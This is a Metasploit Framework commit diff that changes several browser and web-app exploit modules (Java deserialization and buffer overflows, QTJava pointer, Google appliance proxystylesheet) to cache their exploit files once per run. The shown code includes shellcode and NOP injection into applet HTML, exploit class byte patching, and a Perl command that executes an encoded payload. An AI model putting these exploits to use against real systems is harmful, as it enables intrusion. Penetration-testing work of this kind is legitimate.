try not to repeatedly load static files - see #694

git-svn-id: file:///home/svn/framework3/trunk@8166 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/scanner/tftp/tftpbrute.rb

@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(69),
-				OptPath.new('DICTIONARY', [ true, 'The list of filenames', File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
+				OptPath.new('DICTIONARY', [ true, 'The list of filenames',
+					File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
 			], self.class)
 	end
 

modules/exploits/multi/browser/java_calendar_deserialize.rb

@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -28,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        => [ 'sf', 'hdm' ],
-			'Version'       => '1',
+			'Version'       => '$Revision$',
 			'References'    =>
 			[
 				[ 'CVE', '2008-5353' ],
@@ -80,6 +84,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
+	def exploit
+		# load the static jar file
+		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
+		fd = File.open( path, "rb" )
+		@jar_data = fd.read(fd.stat.size)
+		fd.close
+
+		super
+	end
+
+
 	def on_request_uri( cli, request )
 		data = nil
 		host = nil
@@ -151,11 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_jar()
-		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
-		fd = File.open( path, "rb" )
-		data = fd.read(fd.stat.size)
-		fd.close
-		return data
+		return @jar_data
 	end
 
 end

modules/exploits/multi/browser/java_getsoundbank_bof.rb

@@ -14,7 +14,7 @@ require 'msf/core'
 
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+	Rank = GreatRanking
 
 	#
 	# This module acts as an HTTP server
@@ -95,6 +95,17 @@ No automatic targetting for now ...
 	end
 
 
+	def exploit
+		# load the static jar
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
+		fd = File.open(path, "rb")
+		@jar_data = fd.read(fd.stat.size)
+		fd.close
+
+		super
+	end
+
+
 	def on_request_uri(cli, req)
 
 		# Create a cached mapping between IP and detected target
@@ -169,14 +180,18 @@ No automatic targetting for now ...
   <!-- <meta http-equiv=refresh content=10 /> -->
  </head>
  <body>
-  <applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'>
+  <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
    <param name='sc' value='SCODE' />
    <param name='np' value='NOPS' />
   </applet>
  </body>
 </html>
 |
-		# ugh.. pain
+		# finalize the html
+		jar_name = rand_text_alphanumeric(32)
+		html.gsub!(/JARNAME/, jar_name)
+
+		# add payload
 		debug_payload = false
 		pload = ""
 		pload << "\xcc" if debug_payload
@@ -189,6 +204,7 @@ No automatic targetting for now ...
 		end
 		html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
 
+		# add nops
 		nops = "\x90\x90\x90\x90"
 		html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
 		#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
@@ -211,13 +227,7 @@ No automatic targetting for now ...
 			this_target = target
 		end
 
-		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
-
-		fd = File.open(path, "rb")
-		data = fd.read(fd.stat.size)
-		fd.close
-		
-		return data
+		return @jar_data
 	end
 
 end

modules/exploits/multi/browser/java_setdifficm_bof.rb

@@ -14,7 +14,7 @@ require 'msf/core'
 
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+	Rank = GreatRanking
 
 	#
 	# This module acts as an HTTP server
@@ -169,14 +169,18 @@ No automatic targetting for now ...
   <!-- <meta http-equiv=refresh content=10 /> -->
  </head>
  <body>
-  <applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'>
+  <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
    <param name='sc' value='SCODE' />
    <param name='np' value='NOPS' />
   </applet>
  </body>
 </html>
 |
-		# ugh.. pain
+		# finalize html
+		jar_name = rand_text_alphanumeric(32)+".jar"
+		html.gsub!(/JARNAME/, jar_name)
+
+		# put payload into html
 		debug_payload = false
 		pload = ""
 		pload << "\xcc" if debug_payload
@@ -189,6 +193,7 @@ No automatic targetting for now ...
 		end
 		html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
 
+		# put nops into html
 		nops = "\x90\x90\x90\x90"
 		html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
 		#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
@@ -198,6 +203,16 @@ No automatic targetting for now ...
 	end
 
 
+	def exploit
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
+		fd = File.open(path, "rb")
+		@jar_data = fd.read(fd.stat.size)
+		fd.close
+
+		super
+	end
+
+
 	def generate_applet(cli, req)
 
 		this_target = nil
@@ -211,13 +226,7 @@ No automatic targetting for now ...
 			this_target = target
 		end
 
-		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
-
-		fd = File.open(path, "rb")
-		data = fd.read(fd.stat.size)
-		fd.close
-		
-		return data
+		return @jar_data
 	end
 
 end

modules/exploits/multi/browser/qtjava_pointer.rb

@@ -84,6 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			))
 	end
 
+
+	def exploit
+		# load the class data
+		path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
+		fd = File.open(path, "rb")
+		@class_data = fd.read(fd.stat.size)
+		fd.close
+
+		super
+	end
+
+
 	def on_request_uri(cli, req)
 
 		# Create a cached mapping between IP and detected target
@@ -157,11 +169,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			this_target = target
 		end
 
-		path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
-
-		fd = File.open(path, "rb")
-		data = fd.read(fd.stat.size)
-		fd.close
+		# make a copy..
+		data = @class_data.dup
 
 		# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
 		idx_targ = data.index("\x03\x10\xcc\x54")
@@ -202,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		while (cnt < buff.length)
 			cnt += 1
 			while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
-				off+=1
+				off += 1
 			end
 			data[off]=buff[cnt-1]
 			off += 1

modules/exploits/unix/webapp/google_proxystylesheet_exec.rb

@@ -61,14 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Handling new incoming HTTP request...")
 
-		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
-		
-		fd = File.open(path, "r")
-		data = fd.read(fd.stat.size)
-		fd.close
-
 		exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
-		data.gsub!(/:x:MSF:x:/, exec_str)
+		data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
 		send_response(cli, data)
 	end
 
@@ -101,6 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
+		# load the xml data
+		path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
+		fd = File.open(path, "r")
+		@xml_data = fd.read(fd.stat.size)
+		fd.close
+
 		print_status("Obtaining the appliance site and client IDs...")
 		# Send a HTTP/1.0 request to learn the site configuration
 		res = send_request_raw({